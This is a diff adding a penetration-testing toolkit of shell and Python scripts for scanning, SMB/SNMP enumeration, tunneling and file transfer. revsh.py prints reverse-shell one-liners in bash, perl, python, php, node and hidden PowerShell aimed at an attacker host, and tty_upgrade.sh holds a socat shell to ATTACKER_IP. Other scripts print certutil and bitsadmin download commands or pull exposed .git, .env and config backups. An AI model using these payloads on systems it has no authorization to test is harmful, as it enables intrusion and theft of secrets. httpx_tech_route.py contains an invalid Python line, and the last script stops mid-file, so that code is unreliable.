bin/scan/masscan_top.sh Executable file
View File

@@ -0,0 +1,10 @@
#!/usr/bin/env bash
set -euo pipefail
target=${1:-${TARGET:-}}
rate=${2:-10000}
[[ -z "$target" ]] && { echo "Usage: $(basename "$0") <target> [rate] (requires masscan)" >&2; exit 1; }
if ! command -v masscan >/dev/null 2>&1; then
echo "[!] masscan not found." >&2; exit 2
fi
masscan "$target" --top-ports 1000 --rate "$rate" --wait 0

10
bin/scan/naabu_quick.sh Executable file
View File

@@ -0,0 +1,10 @@
#!/usr/bin/env bash
set -euo pipefail
target=${1:-${TARGET:-}}
[[ -z "$target" ]] && { echo "Usage: $(basename "$0") <target> [flags...] (requires naabu)" >&2; exit 1; }
shift || true
if ! command -v naabu >/dev/null 2>&1; then
echo "[!] naabu not found." >&2; exit 2
fi
naabu -host "$target" -top-ports 1000 -rate 10000 "$@"

22
bin/shells/listener.sh Executable file
View File

@@ -0,0 +1,22 @@
#!/usr/bin/env bash
set -euo pipefail
port=${1:-}
[[ -z "$port" ]] && { echo "Usage: $(basename "$0") <port>" >&2; exit 1; }
if command -v rlwrap >/dev/null 2>&1; then
if command -v ncat >/dev/null 2>&1; then
echo "[+] rlwrap ncat -lvnp $port"
exec rlwrap ncat -lvnp "$port"
else
echo "[+] rlwrap nc -lvnp $port"
exec rlwrap nc -lvnp "$port"
fi
else
if command -v ncat >/dev/null 2>&1; then
exec ncat -lvnp "$port"
else
exec nc -lvnp "$port"
fi
fi

32
bin/shells/revsh.py Executable file
View File

@@ -0,0 +1,32 @@
#!/usr/bin/env python3
import sys
def usage():
print(f"Usage: {sys.argv[0]} <lhost> <lport>")
sys.exit(1)
if len(sys.argv) < 3:
usage()
ip = sys.argv[1]
port = sys.argv[2]
tpls = {
'bash_tcp': f"bash -c 'bash -i >& /dev/tcp/{ip}/{port} 0>&1'",
'bash_udp': f"bash -c 'bash -i >& /dev/udp/{ip}/{port} 0>&1'",
'nc_mkfifo': f"rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc {ip} {port} >/tmp/f",
'ncat': f"ncat {ip} {port} -e /bin/sh",
'ncat_pty': f"ncat --ssl {ip} {port} -e /bin/bash",
'perl': f"perl -e 'use Socket;$i=\"{ip}\";$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'",
'python3': f"python3 -c 'import os,pty,socket as s;h=\"{ip}\";p={port};c=s.socket();c.connect((h,p));[os.dup2(c.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/bash\")'",
'php': f"php -r '$sock=fsockopen(\"{ip}\",{port});exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
'ruby': f"ruby -rsocket -e'f=TCPSocket.open(\"{ip}\",{port}).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'",
'node': f"node -e 'var s=require(\"net\").Socket();s.connect({port},\"{ip}\",function(){{s.pipe(process.stdout);process.stdin.pipe(s);}});'",
'powershell_tcp': f"powershell -NoP -W Hidden -Exec Bypass -Command \"$c=New-Object System.Net.Sockets.TCPClient(\'{ip}\',{port});$s=$c.GetStream();[byte[]]$b=0..65535|%{{0}};while(($i=$s.Read($b,0,$b.Length)) -ne 0){{;$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$sb=(iex $d 2>&1 | Out-String);$sb2=$sb+\'PS \'+(pwd).Path+\'> \';$sbBytes=([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbBytes,0,$sbBytes.Length);$s.Flush()}}\"",
'socat_listener': f"socat -d -d TCP-LISTEN:{port},fork,reuseaddr FILE:`tty`,raw,echo=0",
'socat_target': f"socat TCP:{ip}:{port} EXEC:/bin/bash,pty,stderr,setsid,sigint,sane",
}
for k, v in tpls.items():
print(f"[{k}]\n{v}\n")

22
bin/shells/tty_upgrade.sh Executable file
View File

@@ -0,0 +1,22 @@
#!/usr/bin/env bash
cat <<'TXT'
TTY upgrade tips:
Python:
python3 -c 'import pty; pty.spawn("/bin/bash")'
stty raw -echo; fg
stty rows 40 columns 120; export TERM=xterm
Script:
/usr/bin/script -qc /bin/bash /dev/null
Busybox:
busybox sh
Socat (on target):
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ATTACKER_IP:PORT
Socat listener (attacker):
socat -d -d TCP-LISTEN:PORT,reuseaddr,fork FILE:`tty`,raw,echo=0
TXT

10
bin/smb/enum4linux_ng.sh Executable file
View File

@@ -0,0 +1,10 @@
#!/usr/bin/env bash
set -euo pipefail
host=${1:-${TARGET:-}}
[[ -z "$host" ]] && { echo "Usage: $(basename "$0") <host> [args...]" >&2; exit 1; }
shift || true
if ! command -v enum4linux-ng >/dev/null 2>&1; then
echo "[!] enum4linux-ng not found." >&2; exit 2
fi
exec enum4linux-ng -A "$host" "$@"

25
bin/smb/smb_check_write.sh Executable file
View File

@@ -0,0 +1,25 @@
#!/usr/bin/env bash
set -euo pipefail
usage(){ echo "Usage: $(basename "$0") <host> <share> [user] [pass]" >&2; exit 1; }
host=${1:-${TARGET:-}}
share=${2:-}
user=${3:-}
pass=${4:-}
[[ -z "$host" || -z "$share" ]] && usage
tmpfile=".writetest_$(date +%s).txt"
echo test > "$tmpfile"
trap 'rm -f "$tmpfile" >/dev/null 2>&1 || true' EXIT
if command -v smbclient >/dev/null 2>&1; then
if [[ -n "$user" ]]; then
echo "put $tmpfile; rm $tmpfile; exit" | smbclient -U "$user%$pass" "//$host/$share" -c - 2>/dev/null && echo "[+] Writable via smbclient" && exit 0
else
echo "put $tmpfile; rm $tmpfile; exit" | smbclient -N "//$host/$share" -c - 2>/dev/null && echo "[+] Writable via smbclient (anon)" && exit 0
fi
fi
echo "[-] Could not confirm write access"
exit 1

13
bin/smb/smbmap_quick.sh Executable file
View File

@@ -0,0 +1,13 @@
#!/usr/bin/env bash
set -euo pipefail
host=${1:-${TARGET:-}}
user=${2:-}
pass=${3:-}
[[ -z "$host" ]] && { echo "Usage: $(basename "$0") <host> [user] [pass]" >&2; exit 1; }
if ! command -v smbmap >/dev/null 2>&1; then echo "[!] smbmap not found" >&2; exit 2; fi
if [[ -n "$user" ]]; then
exec smbmap -H "$host" -u "$user" -p "$pass"
else
exec smbmap -H "$host" -u '' -p ''
fi

40
bin/smb_enum.sh Executable file
View File

@@ -0,0 +1,40 @@
#!/usr/bin/env bash
set -euo pipefail
usage(){
cat >&2 <<USAGE
Usage: $(basename "$0") <ip> [user] [pass]
- Anonymous or credentialed SMB quick enumeration.
USAGE
exit 1
}
ip=${1:-${TARGET:-}}
user=${2:-}
pass=${3:-}
[[ -z "$ip" ]] && usage
outdir=${OUTDIR:-scans}
mkdir -p "$outdir"
ts=$(date +%Y%m%d_%H%M%S)
base="$outdir/${ip//\//_}_smb_${ts}"
echo "[+] SMB nmap scripts"
nmap -Pn -p 139,445 --script smb-protocols,smb2-security-mode,smb2-time,smb2-capabilities,smb-security-mode -oN "$base.nmap" "$ip" || true
if [[ -z "$user" ]]; then
echo "[+] smbclient -N -L //$ip"
(smbclient -N -L "//$ip" || true) | tee "$base.smbclient.list"
else
echo "[+] smbclient -L //$ip -U $user%<hidden>"
(smbclient -L "//$ip" -U "$user%$pass" || true) | tee "$base.smbclient.list"
fi
echo "[+] Attempting anonymous share listing"
awk '/Disk/{print $1}' "$base.smbclient.list" | grep -vE '^-|Printer|IPC\$' | while read -r share; do
echo "--- Listing //$ip/$share (anon) ---" | tee -a "$base.shares.txt"
(echo -e "recurse ON\nls\nexit\n" | smbclient -N "//$ip/$share" || true) | tee -a "$base.shares.txt"
done
echo "[+] Saved outputs under $base.*"

22
bin/snmp_enum.sh Executable file
View File

@@ -0,0 +1,22 @@
#!/usr/bin/env bash
set -euo pipefail
ip=${1:-${TARGET:-}}
community=${2:-public}
[[ -z "$ip" ]] && { echo "Usage: $(basename "$0") <ip> [community]" >&2; exit 1; }
outdir=${OUTDIR:-scans}
mkdir -p "$outdir"
ts=$(date +%Y%m%d_%H%M%S)
base="$outdir/${ip//\//_}_snmp_${ts}"
echo "[+] SNMP sysDescr"
snmpwalk -v2c -c "$community" "$ip" 1.3.6.1.2.1.1 2>/dev/null | tee "$base.sysdescr.txt" || true
echo "[+] SNMP Users, Processes, TCP/UDP (if allowed)"
snmpwalk -v2c -c "$community" "$ip" 1.3.6.1.2.1.25 2>/dev/null | tee "$base.hostresources.txt" || true
snmpwalk -v2c -c "$community" "$ip" 1.3.6.1.2.1.6 2>/dev/null | tee "$base.tcp.txt" || true
snmpwalk -v2c -c "$community" "$ip" 1.3.6.1.2.1.7 2>/dev/null | tee "$base.udp.txt" || true
echo "[+] Saved outputs under $base.*"

40
bin/transfer/dl_oneshots.sh Executable file
View File

@@ -0,0 +1,40 @@
#!/usr/bin/env bash
set -euo pipefail
usage(){
cat >&2 <<USAGE
Usage: $(basename "$0") <lhost> <port> <filename>
Print common one-liners to download http://<lhost>:<port>/<filename>.
USAGE
exit 1
}
host=${1:-}
port=${2:-}
file=${3:-}
[[ -z "$host" || -z "$port" || -z "$file" ]] && usage
url="http://$host:$port/$file"
cat <<TXT
Linux wget:
wget -qO $file "$url"
Linux curl:
curl -fsSL "$url" -o $file
BusyBox wget:
busybox wget -O $file "$url"
Powershell (WebClient):
powershell -c "$wc=new-object system.net.webclient;$wc.downloadfile('$url','$file')"
Powershell (Invoke-WebRequest):
powershell -c "iwr -uri '$url' -outfile '$file'"
certutil:
certutil -urlcache -split -f "$url" $file
bitsadmin:
bitsadmin /transfer job /download /priority normal "$url" "$file"
TXT

7
bin/transfer/http_serve.sh Executable file
View File

@@ -0,0 +1,7 @@
#!/usr/bin/env bash
set -euo pipefail
port=${1:-8000}
echo "[+] python3 -m http.server $port (Ctrl+C to stop)"
python3 -m http.server "$port"

10
bin/transfer/push_http.sh Executable file
View File

@@ -0,0 +1,10 @@
#!/usr/bin/env bash
set -euo pipefail
usage(){ echo "Usage: $(basename "$0") <file> <http://host:port/upload>" >&2; exit 1; }
file=${1:-}
url=${2:-}
[[ -z "$file" || -z "$url" ]] && usage
curl -fsS -F "file=@${file}" "$url"

60
bin/transfer/serve.py Executable file
View File

@@ -0,0 +1,60 @@
#!/usr/bin/env python3
import http.server, socketserver, os, cgi, sys
PORT = int(os.environ.get('PORT', sys.argv[1] if len(sys.argv) > 1 else 8000))
UPLOAD_DIR = os.environ.get('UPLOAD_DIR', '.')
class Handler(http.server.SimpleHTTPRequestHandler):
def list_directory(self, path):
# Add simple upload form to listing
r = super().list_directory(path)
try:
r.seek(0)
content = r.read().decode('utf-8', 'ignore')
form = (
"<hr><h3>Upload</h3>"
"<form ENCTYPE='multipart/form-data' method='post' action='/upload'>"
"<input name='file' type='file'/>"
"<input type='submit' value='upload'/></form>"
)
content = content.replace('</body>', form + '</body>')
r = bytes(content, 'utf-8')
self.send_response(200)
self.send_header("Content-type", "text/html; charset=utf-8")
self.send_header("Content-Length", str(len(r)))
self.end_headers()
self.wfile.write(r)
return None
except Exception:
return super().list_directory(path)
def do_POST(self):
if self.path != '/upload':
self.send_error(404, "Unknown endpoint")
return
form = cgi.FieldStorage(
fp=self.rfile,
headers=self.headers,
environ={'REQUEST_METHOD': 'POST', 'CONTENT_TYPE': self.headers['Content-Type']}
)
if 'file' not in form:
self.send_error(400, "No file field")
return
field = form['file']
filename = os.path.basename(field.filename) if field.filename else 'upload.bin'
dest = os.path.join(UPLOAD_DIR, filename)
with open(dest, 'wb') as f:
data = field.file.read()
f.write(data)
self.send_response(200)
self.end_headers()
self.wfile.write(f"Uploaded {filename} ({len(data)} bytes)\n".encode())
if __name__ == '__main__':
with socketserver.TCPServer(("0.0.0.0", PORT), Handler) as httpd:
print(f"[*] Serving HTTP on 0.0.0.0:{PORT}, upload dir: {UPLOAD_DIR}")
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass

15
bin/transfer/smb_server.sh Executable file
View File

@@ -0,0 +1,15 @@
#!/usr/bin/env bash
set -euo pipefail
share=${1:-share}
path=${2:-.}
[[ ! -d "$path" ]] && { echo "Usage: $(basename "$0") [share] [path]" >&2; exit 1; }
if ! command -v impacket-smbserver >/dev/null 2>&1; then
echo "[!] impacket-smbserver not found. Install impacket." >&2
exit 2
fi
echo "[+] Serving SMB share '$share' from $path"
exec impacket-smbserver "$share" "$path" -smb2support

8
bin/tunnel/autossh_socks.sh Executable file
View File

@@ -0,0 +1,8 @@
#!/usr/bin/env bash
set -euo pipefail
host=${1:-}
port=${2:-1080}
[[ -z "$host" ]] && { echo "Usage: $(basename "$0") <user@host> [local_socks_port]" >&2; exit 1; }
if ! command -v autossh >/dev/null 2>&1; then echo "[!] autossh not found" >&2; exit 2; fi
exec autossh -M 0 -N -D "$port" "$host"

19
bin/tunnel/chisel_client.sh Executable file
View File

@@ -0,0 +1,19 @@
#!/usr/bin/env bash
set -euo pipefail
usage(){
cat >&2 <<USAGE
Usage:
$(basename "$0") <server_host:port> R:<lport>:<rhost>:<rport> [R:...]
Example:
$(basename "$0") 10.10.14.1:8000 R:8080:127.0.0.1:80
USAGE
exit 1
}
server=${1:-}
[[ -z "$server" || -z ${2:-} ]] && usage
shift
if ! command -v chisel >/dev/null 2>&1; then echo "[!] chisel not found" >&2; exit 2; fi
exec chisel client "$server" "$@"

7
bin/tunnel/chisel_server.sh Executable file
View File

@@ -0,0 +1,7 @@
#!/usr/bin/env bash
set -euo pipefail
port=${1:-8000}
[[ -z "$port" ]] && { echo "Usage: $(basename "$0") <port> (requires chisel)" >&2; exit 1; }
if ! command -v chisel >/dev/null 2>&1; then echo "[!] chisel not found" >&2; exit 2; fi
exec chisel server --reverse -p "$port"

28
bin/tunnel/socat_forward.sh Executable file
View File

@@ -0,0 +1,28 @@
#!/usr/bin/env bash
set -euo pipefail
usage(){
cat >&2 <<USAGE
Usage:
Forward local -> remote: $(basename "$0") -L <lport> <rhost> <rport>
Reverse remote -> local: $(basename "$0") -R <lport> <rhost> <rport>
Examples:
# On attacker, listen and connect from target (reverse):
$(basename "$0") -R 4444 127.0.0.1 80
USAGE
exit 1
}
[[ $# -lt 4 ]] && usage
mode=$1; lport=$2; rhost=$3; rport=$4
if [[ "$mode" == "-L" ]]; then
echo "[+] socat -d -d TCP-LISTEN:$lport,reuseaddr,fork TCP:$rhost:$rport"
exec socat -d -d TCP-LISTEN:"$lport",reuseaddr,fork TCP:"$rhost":"$rport"
elif [[ "$mode" == "-R" ]]; then
echo "[+] Reverse: connect to attacker and forward to $rhost:$rport"
echo " On attacker: socat -d -d TCP-LISTEN:$lport,reuseaddr,fork TCP:$rhost:$rport"
else
usage
fi

21
bin/web/backup_hunter.sh Executable file
View File

@@ -0,0 +1,21 @@
#!/usr/bin/env bash
set -euo pipefail
base=${1:-}
[[ -z "$base" ]] && { echo "Usage: $(basename "$0") <base-url> [list-of-paths.txt]" >&2; exit 1; }
list=${2:-}
paths=(index.php index.html config.php config.php~ config.php.bak .env .env.bak .git/HEAD .svn/entries backup.zip backup.tar.gz db.sql db.sql.gz site.zip wp-config.php wp-config.php~ robots.txt)
if [[ -n "$list" && -f "$list" ]]; then
mapfile -t extra < "$list"; paths+=("${extra[@]}")
fi
for p in "${paths[@]}"; do
url="${base%/}/$p"
code=$(curl -sk -o /dev/null -m 6 -w "%{http_code}" "$url" || true)
if [[ "$code" != "404" && "$code" != "000" ]]; then
size=$(curl -skI "$url" | awk -F': ' 'tolower($1)=="content-length"{print $2}' | tr -d '\r')
echo -e "[+] $code\t$size\t$url"
fi
done

8
bin/web/clone_site.sh Executable file
View File

@@ -0,0 +1,8 @@
#!/usr/bin/env bash
set -euo pipefail
url=${1:-}
out=${2:-site_mirror}
[[ -z "$url" ]] && { echo "Usage: $(basename "$0") <url> [outdir]" >&2; exit 1; }
wget --mirror --convert-links --adjust-extension --page-requisites --no-parent -P "$out" "$url"
echo "[+] Mirror saved under $out"

9
bin/web/confluence_quick.sh Executable file
View File

@@ -0,0 +1,9 @@
#!/usr/bin/env bash
set -euo pipefail
url=${1:-}
[[ -z "$url" ]] && { echo "Usage: $(basename "$0") <confluence-url>" >&2; exit 1; }
echo "[+] Confluence quick checks for $url"
curl -sk "$url/rest/api/content?limit=1" | sed 's/.*/[api] &/' || true
curl -sk "$url/login.action" | head -c 200 | sed 's/.*/[login] &/' || true
curl -sk -I "$url/" | sed -n '1,20p' | sed 's/.*/[hdr] &/' || true

25
bin/web/cors_tester.py Executable file
View File

@@ -0,0 +1,25 @@
#!/usr/bin/env python3
import sys, requests
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <url> [origin]", file=sys.stderr)
sys.exit(1)
url = sys.argv[1]
origin = sys.argv[2] if len(sys.argv) > 2 else 'https://evil.example'
try:
r = requests.get(url, headers={'Origin': origin}, timeout=8, verify=False)
acao = r.headers.get('Access-Control-Allow-Origin', '')
acac = r.headers.get('Access-Control-Allow-Credentials', '')
print(f"Origin: {origin}")
print(f"Status: {r.status_code}")
print(f"Access-Control-Allow-Origin: {acao}")
print(f"Access-Control-Allow-Credentials: {acac}")
if acao == '*' and acac.lower() == 'true':
print('[!] Potentially dangerous: ACAO=* with credentials allowed')
elif origin in (acao or ''):
print('[+] Reflection of Origin detected')
except Exception as e:
print(f"[!] Error: {e}", file=sys.stderr)

46
bin/web/crawl_words.py Executable file
View File

@@ -0,0 +1,46 @@
#!/usr/bin/env python3
import sys, re, html, urllib.parse, urllib.request
def fetch(url):
try:
req = urllib.request.Request(url, headers={'User-Agent':'Mozilla/5.0'})
with urllib.request.urlopen(req, timeout=8) as r:
return r.read().decode('utf-8', 'ignore')
except Exception as e:
sys.stderr.write(f"[!] fetch error for {url}: {e}\n")
return ''
def extract_links(base, htmltext):
links = set()
for m in re.finditer(r'href=["\']([^"\']+)["\']', htmltext, re.I):
href = m.group(1)
if href.startswith('#') or href.startswith('mailto:'): continue
url = urllib.parse.urljoin(base, href)
links.add(url)
return links
def words(text):
text = html.unescape(text)
return set(w.lower() for w in re.findall(r'[A-Za-z][A-Za-z0-9_\-]{3,}', text))
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <url> [depth]", file=sys.stderr); sys.exit(1)
start = sys.argv[1]
depth = int(sys.argv[2]) if len(sys.argv) > 2 else 1
visited=set([start]); frontier=[start]
all_words=set()
for _ in range(depth):
new=[]
for u in list(frontier):
body = fetch(u)
all_words |= words(body)
for v in extract_links(u, body):
if v not in visited and urllib.parse.urlparse(v).netloc == urllib.parse.urlparse(start).netloc:
visited.add(v); new.append(v)
frontier = new
for w in sorted(all_words):
print(w)

27
bin/web/dirbuster.sh Executable file
View File

@@ -0,0 +1,27 @@
#!/usr/bin/env bash
set -euo pipefail
usage(){
cat >&2 <<USAGE
Usage: $(basename "$0") <url> [wordlist] [exts]
url e.g. http://10.10.10.10/
wordlist default: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
exts comma ext list, default: php,txt,conf,bak,old,zip,tar.gz,7z
Requires: ffuf
USAGE
exit 1
}
url=${1:-}
[[ -z "$url" ]] && usage
wordlist=${2:-/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt}
exts=${3:-php,txt,conf,bak,old,zip,tar.gz,7z}
outdir=${OUTDIR:-scans}
mkdir -p "$outdir"
ts=$(date +%Y%m%d_%H%M%S)
base="$outdir/ffuf_$(echo -n "$url" | tr '/:' '__')_${ts}"
ffuf -u "$url"/FUZZ -w "$wordlist" -e "$exts" -mc all -fc 404 -recursion -recursion-depth 2 -t 50 -of csv -o "$base.csv" 2>&1 | tee "$base.log"
echo "[+] Results saved to $base.csv"

14
bin/web/droopescan_quick.sh Executable file
View File

@@ -0,0 +1,14 @@
#!/usr/bin/env bash
set -euo pipefail
url=${1:-}
[[ -z "$url" ]] && { echo "Usage: $(basename "$0") <url> (requires droopescan)" >&2; exit 1; }
if ! command -v droopescan >/dev/null 2>&1; then echo "[!] droopescan not found" >&2; exit 2; fi
# Detect CMS via droopescan auto if available; fallback to drupal scan
if droopescan scan --help 2>&1 | grep -q "auto"; then
exec droopescan scan auto -u "$url"
else
exec droopescan scan drupal -u "$url"
fi

22
bin/web/git_dumper.sh Executable file
View File

@@ -0,0 +1,22 @@
#!/usr/bin/env bash
set -euo pipefail
base=${1:-}
out=${2:-gitdump}
[[ -z "$base" ]] && { echo "Usage: $(basename "$0") <base-url> [outdir]" >&2; exit 1; }
mkdir -p "$out/.git"
cd "$out"
echo "[+] Attempting to mirror .git from $base"
wget -q --no-host-directories --cut-dirs=0 -r -np -nH -R "index.html*" "${base%/}/.git/" || true
if [[ -d .git ]]; then
echo "[+] Found .git directory. Trying to restore working tree."
git init >/dev/null 2>&1 || true
git reset --hard >/dev/null 2>&1 || true
echo "[+] Done. Inspect repo at: $(pwd)"
else
echo "[!] .git not accessible or download failed."
fi

16
bin/web/gobuster_dir.sh Executable file
View File

@@ -0,0 +1,16 @@
#!/usr/bin/env bash
set -euo pipefail
url=${1:-}
wordlist=${2:-/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt}
exts=${3:-php,txt,conf,bak,old,zip,tar.gz}
threads=${4:-50}
[[ -z "$url" ]] && { echo "Usage: $(basename "$0") <url> [wordlist] [exts] [threads] (requires gobuster)" >&2; exit 1; }
if ! command -v gobuster >/dev/null 2>&1; then
echo "[!] gobuster not found. Install gobuster." >&2
exit 2
fi
gobuster dir -u "$url" -w "$wordlist" -x "$exts" -t "$threads" -k -e -q

11
bin/web/gobuster_vhost.sh Executable file
View File

@@ -0,0 +1,11 @@
#!/usr/bin/env bash
set -euo pipefail
url=${1:-}
wordlist=${2:-/usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt}
threads=${3:-50}
[[ -z "$url" ]] && { echo "Usage: $(basename "$0") <base-url> [wordlist] [threads] (requires gobuster)" >&2; exit 1; }
command -v gobuster >/dev/null 2>&1 || { echo "[!] gobuster not found" >&2; exit 2; }
exec gobuster vhost -u "$url" -w "$wordlist" -t "$threads" -k -q

6
bin/web/http_headers.sh Executable file
View File

@@ -0,0 +1,6 @@
#!/usr/bin/env bash
set -euo pipefail
url=${1:-}
[[ -z "$url" ]] && { echo "Usage: $(basename "$0") <url>" >&2; exit 1; }
curl -skI -m 10 "$url"

23
bin/web/httpx_presets.sh Executable file
View File

@@ -0,0 +1,23 @@
#!/usr/bin/env bash
set -euo pipefail
profile=${1:-balanced}
input=${2:-}
[[ -z "$input" ]] && { echo "Usage: $(basename "$0") <profile: slow|balanced|aggressive> <host|file> [extra httpx flags]" >&2; exit 1; }
shift 2 || true
if ! command -v httpx >/dev/null 2>&1; then echo "[!] httpx not found" >&2; exit 2; fi
case "$profile" in
slow) rate=50; timeout=10; retries=3; threads=25;;
balanced) rate=300; timeout=7; retries=2; threads=50;;
aggressive)rate=1200; timeout=5; retries=1; threads=150;;
*) echo "[!] Unknown profile" >&2; exit 1;;
esac
if [[ -f "$input" ]]; then
exec httpx -silent -l "$input" -rate "$rate" -timeout "$timeout" -retries "$retries" -threads "$threads" -status-code -title -tech-detect "$@"
else
printf "%s\n" "$input" | httpx -silent -rate "$rate" -timeout "$timeout" -retries "$retries" -threads "$threads" -status-code -title -tech-detect "$@"
fi

18
bin/web/httpx_probe.sh Executable file
View File

@@ -0,0 +1,18 @@
#!/usr/bin/env bash
set -euo pipefail
input=${1:-}
[[ -z "$input" ]] && { echo "Usage: $(basename "$0") <host|file> [extra httpx flags]" >&2; exit 1; }
shift || true
if ! command -v httpx >/dev/null 2>&1; then
echo "[!] httpx not found. Install httpx (projectdiscovery)." >&2
exit 2
fi
if [[ -f "$input" ]]; then
exec httpx -silent -l "$input" -status-code -title -tech-detect -asn -ip -hash -server "$@"
else
printf "%s\n" "$input" | httpx -silent -status-code -title -tech-detect -asn -ip -hash -server "$@"
fi

134
bin/web/httpx_tech_route.py Executable file
View File

@@ -0,0 +1,134 @@
#!/usr/bin/env python3
import sys, os, json, subprocess, tempfile
HELP = """Usage: httpx_tech_route.py <host|file> [--tech list] [--severity sevlist] [--wpscan] [--wpscan-limit N] [--extra] [--extra-limit N] [--dry-run]
Runs httpx -json -tech-detect, groups URLs by technologies, and runs nuclei per tech presets.
Tech presets map:
wordpress -> nuclei tags: wordpress (+ optional wpscan_quick)
drupal, joomla, laravel, aspnet, spring, tomcat, iis, exchange, sharepoint, grafana, kibana, gitlab, confluence, jupyter -> nuclei tag same as tech
"""
if len(sys.argv) < 2:
print(HELP, file=sys.stderr); sys.exit(1)
arg = sys.argv[1]
dry = '--dry-run' in sys.argv
tech_filter = None
severity = 'medium,high,critical'
wpscan = '--wpscan' in sys.argv
wpscan_limit = 5
extra = '--extra' in sys.argv
extra_limit = 5
if '--tech' in sys.argv:
i = sys.argv.index('--tech')
if i+1 < len(sys.argv): tech_filter = set(sys.argv[i+1].lower().split(','))
if '--severity' in sys.argv:
i = sys.argv.index('--severity')
if i+1 < len(sys.argv): severity = sys.argv[i+1]
if '--wpscan-limit' in sys.argv:
i = sys.argv.index('--wpscan-limit')
if i+1 < len(sys.argv): wpscan_limit = int(sys.argv[i+1])
if '--extra-limit' in sys.argv:
i = sys.argv.index('--extra-limit')
if i+1 < len(sys.argv): extra_limit = int(sys.argv[i+1])
def run(cmd):
try:
return subprocess.check_output(cmd, stderr=subprocess.STDOUT).decode()
except Exception:
return ''
if not shutil := __import__('shutil') or True:
pass
if not shutil.which('httpx'):
print('[!] httpx not found', file=sys.stderr); sys.exit(2)
if not shutil.which('nuclei') and not dry:
print('[!] nuclei not found', file=sys.stderr); sys.exit(2)
json_lines = ''
if os.path.isfile(arg):
json_lines = run(['httpx','-silent','-l',arg,'-ports','80,81,88,443,3000,5000,7001,7002,8000,8008,8080,8081,8088,8443,8888,9000','-tech-detect','-json'])
else:
json_lines = run(['bash','-lc',f'printf %s\\n {arg} | httpx -silent -ports 80,81,88,443,3000,5000,7001,7002,8000,8008,8080,8081,8088,8443,8888,9000 -tech-detect -json'])
by_tech = {}
for line in json_lines.splitlines():
try:
o = json.loads(line)
url = o.get('url')
techs = [t.lower() for t in o.get('technologies', [])]
for t in techs:
if tech_filter and t not in tech_filter: continue
by_tech.setdefault(t, set()).add(url)
except Exception:
continue
presets = {
'wordpress': {'tags': 'wordpress', 'wpscan': True},
'drupal': {'tags': 'drupal'},
'joomla': {'tags': 'joomla'},
'laravel': {'tags': 'laravel'},
'aspnet': {'tags': 'aspnet'},
'spring': {'tags': 'spring'},
'tomcat': {'tags': 'tomcat'},
'iis': {'tags': 'iis'},
'exchange': {'tags': 'exchange'},
'sharepoint': {'tags': 'sharepoint'},
'grafana': {'tags': 'grafana'},
'kibana': {'tags': 'kibana'},
'gitlab': {'tags': 'gitlab'},
'confluence': {'tags': 'confluence'},
'jupyter': {'tags': 'jupyter'},
'jenkins': {'tags': 'jenkins'},
'magento': {'tags': 'magento'},
'sonarqube': {'tags': 'sonarqube'},
}
for t, urls in sorted(by_tech.items(), key=lambda x: (-len(x[1]), x[0])):
if not urls: continue
print(f"[+] Tech: {t} ({len(urls)} urls)")
tf = tempfile.NamedTemporaryFile(delete=False, mode='w')
for u in sorted(urls): tf.write(u+'\n')
tf.close()
tag = presets.get(t, {'tags': t}).get('tags', t)
if dry:
print(f"nuclei -l {tf.name} -tags {tag} -severity {severity} -o scans/nuclei_{t}.txt -silent")
else:
outdir = os.environ.get('OUTDIR','scans')
os.makedirs(outdir, exist_ok=True)
out = os.path.join(outdir, f'nuclei_{t}.txt')
subprocess.call(['nuclei','-l',tf.name,'-tags',tag,'-severity',severity,'-o',out,'-silent'])
print(f" nuclei -> {out}")
# Optional WordPress scan
if t == 'wordpress' and wpscan and shutil.which('wpscan') and not dry:
limit = 0
with open(tf.name,'r') as f:
for line in f:
u = line.strip()
if not u: continue
subprocess.call(['bin/web/wpscan_quick.sh', u])
limit += 1
if limit >= wpscan_limit: break
# Optional extra tech-specific quick wrappers
if extra and not dry:
limit = 0
with open(tf.name,'r') as f:
for line in f:
u=line.strip();
if not u: continue
if t == 'drupal' and shutil.which('droopescan'):
subprocess.call(['bin/web/droopescan_quick.sh', u])
elif t == 'joomla' and shutil.which('joomscan'):
subprocess.call(['bin/web/joomscan_quick.sh', u])
elif t == 'jenkins':
subprocess.call(['bin/web/jenkins_quick.sh', u])
elif t == 'sonarqube':
subprocess.call(['bin/web/sonarqube_quick.sh', u])
elif t == 'magento':
subprocess.call(['bin/web/magento_quick.sh', u])
elif t == 'jira':
subprocess.call(['bin/web/jira_quick.sh', u])
elif t == 'confluence':
subprocess.call(['bin/web/confluence_quick.sh', u])
limit += 1
if limit >= extra_limit: break

99
bin/web/httpx_to_nuclei.sh Executable file
View File

@@ -0,0 +1,99 @@
#!/usr/bin/env bash
set -euo pipefail
usage(){
cat >&2 <<USAGE
Usage: $(basename "$0") <host|file> [--severity auto|crit|high|med|low] [--tags <tags>]
Pipeline: httpx (alive URLs) -> nuclei (selected severities/tags). Saves outputs in OUTDIR.
USAGE
exit 1
}
input=${1:-}
[[ -z "$input" ]] && usage
shift || true
sev=auto
tags=${NUCLEI_TAGS:-cves,exposures,misconfig}
while [[ $# -gt 0 ]]; do
case "$1" in
--severity) sev=${2:-auto}; shift 2;;
--tags) tags=${2:-$tags}; shift 2;;
*) echo "[!] Unknown arg: $1" >&2; shift;;
esac
done
command -v httpx >/dev/null 2>&1 || { echo "[!] httpx not found" >&2; exit 2; }
command -v nuclei >/dev/null 2>&1 || { echo "[!] nuclei not found" >&2; exit 2; }
outdir=${OUTDIR:-scans}
mkdir -p "$outdir"
ts=$(date +%Y%m%d_%H%M%S)
